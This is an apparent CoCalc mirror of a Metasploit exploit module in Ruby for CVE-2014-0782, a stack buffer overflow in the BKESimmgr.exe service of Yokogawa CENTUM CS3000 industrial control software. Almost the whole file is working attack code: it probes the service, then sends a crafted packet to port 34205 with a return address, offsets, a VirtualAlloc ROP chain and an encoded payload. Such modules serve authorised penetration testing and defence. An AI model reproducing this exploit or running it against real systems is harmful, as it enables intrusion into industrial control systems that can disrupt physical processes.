Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::Tcp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
16
'Description' => %q{
17
This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
18
exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
19
insecure usage of memcpy, using attacker controlled data as the size count. This module
20
has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
21
2003 SP2.
22
},
23
'Author' => [
24
'juan vazquez',
25
'Redsadic <julian.vilas[at]gmail.com>'
26
],
27
'References' => [
28
['CVE', '2014-0782'],
29
['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
30
['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
31
],
32
'Payload' => {
33
'Space' => 340,
34
'DisableNops' => true,
35
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
36
},
37
'Platform' => 'win',
38
'Targets' => [
39
[
40
'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
41
{
42
'Ret' => 0x61d1274f, # 0x61d1274f # ADD ESP,10 # RETN # libbkebatchepa.dll
43
'Offset' => 64,
44
'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
45
'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
46
}
47
],
48
],
49
'DisclosureDate' => '2014-03-10',
50
'DefaultTarget' => 0,
51
'Notes' => {
52
'Reliability' => UNKNOWN_RELIABILITY,
53
'Stability' => UNKNOWN_STABILITY,
54
'SideEffects' => UNKNOWN_SIDE_EFFECTS
55
}
56
)
57
)
58
59
register_options(
60
[
61
Opt::RPORT(34205)
62
]
63
)
64
end
65
66
def check
67
data = create_pkt(rand_text_alpha(4))
68
69
res = send_pkt(data)
70
71
if res && res.length == 10
72
simmgr_res = parse_response(res)
73
74
if valid_response?(simmgr_res)
75
check_code = Exploit::CheckCode::Appears
76
else
77
check_code = Exploit::CheckCode::Safe
78
end
79
else
80
check_code = Exploit::CheckCode::Safe
81
end
82
83
check_code
84
end
85
86
def exploit
87
bof = rand_text(target['Offset'])
88
bof << [target.ret].pack("V")
89
bof << [target['FakeArgument1']].pack("V")
90
bof << [target['FakeArgument2']].pack("V")
91
bof << rand_text(16) # padding (corrupted bytes)
92
bof << create_rop_chain
93
bof << payload.encoded
94
95
data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
96
data << [bof.length].pack("n")
97
data << bof
98
99
pkt = create_pkt(data)
100
101
print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
102
connect
103
sock.put(pkt)
104
disconnect
105
end
106
107
def create_rop_chain
108
# rop chain generated with mona.py - www.corelan.be
109
rop_gadgets =
110
[
111
0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
112
0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
113
0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
114
0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
115
0x619436d3, # POP EBP # RETN [libbkeeda.dll]
116
0x61615424, # & push esp # ret [libbkeldc.dll]
117
0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
118
0x00000001, # 0x00000001-> ebx
119
0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
120
0x00001000, # 0x00001000-> edx
121
0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
122
0x00000040, # 0x00000040-> ecx
123
0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
124
0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
125
0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
126
0x90909090, # nop
127
0x619532eb # PUSHAD # RETN [libbkeeda.dll]
128
].pack("V*")
129
130
rop_gadgets
131
end
132
133
def create_pkt(data)
134
pkt = [0x01].pack("N") # Operation Identifier
135
pkt << [data.length].pack("n") # length
136
pkt << data # Fake packet
137
138
pkt
139
end
140
141
def send_pkt(data)
142
connect
143
sock.put(data)
144
res = sock.get_once
145
disconnect
146
147
res
148
end
149
150
def parse_response(data)
151
data.unpack("NnN")
152
end
153
154
def valid_response?(data)
155
valid = false
156
157
if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
158
valid = true
159
end
160
161
valid
162
end
163
end
164
165